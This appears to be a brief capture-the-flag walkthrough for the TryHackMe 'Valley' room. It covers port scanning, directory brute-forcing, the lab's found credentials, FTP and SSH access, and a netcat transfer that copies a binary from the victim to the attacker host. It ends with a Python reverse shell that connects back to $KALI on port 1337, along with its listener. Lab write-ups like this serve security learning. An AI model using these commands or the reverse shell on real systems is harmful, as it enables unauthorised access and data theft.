Valley

Room Link: https://tryhackme.com/room/valleype

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

ftp found on port 37370

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir --url http://$VICTIM/static -w /usr/share/dirb/wordlists/big.txt -l

Kali

ffuf -u http://$VICTIM/static/FUZZ -w /usr/share/dirb/wordlists/big.txt

Username: siemDev
Password: california

TCP/37370 - FTP

Kali

ftp $VICTIM 37370
Username: siemDev
Password: california

TCP/22 - SSH

Kali

ssh valleyDev@$VICTIM
Password: ph0t0s1234

Kali

Lateral Movement

Netcat

Kali(receiving)

nc -l -p 1234 > valleyAuthenticator

Victim(sending)

nc -w 3 $KALI 1234 < valleyAuthenticator

Kali

strings valleyAuthenticator > out.txt

Victim

Username: valley
Password: liberty123

Victim

cat /photos/script/photosEncrypt.py

Victim

locate base64
ls -lah /usr/lib/python3.8/base64.py
groups

Python Reverse Shell

from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("$KALI",1337)) 
dup2(s.fileno(),0) 
dup2(s.fileno(),1) 
dup2(s.fileno(),2) 
run(["/bin/bash","-i"])

Kali

nc -lvnp 1337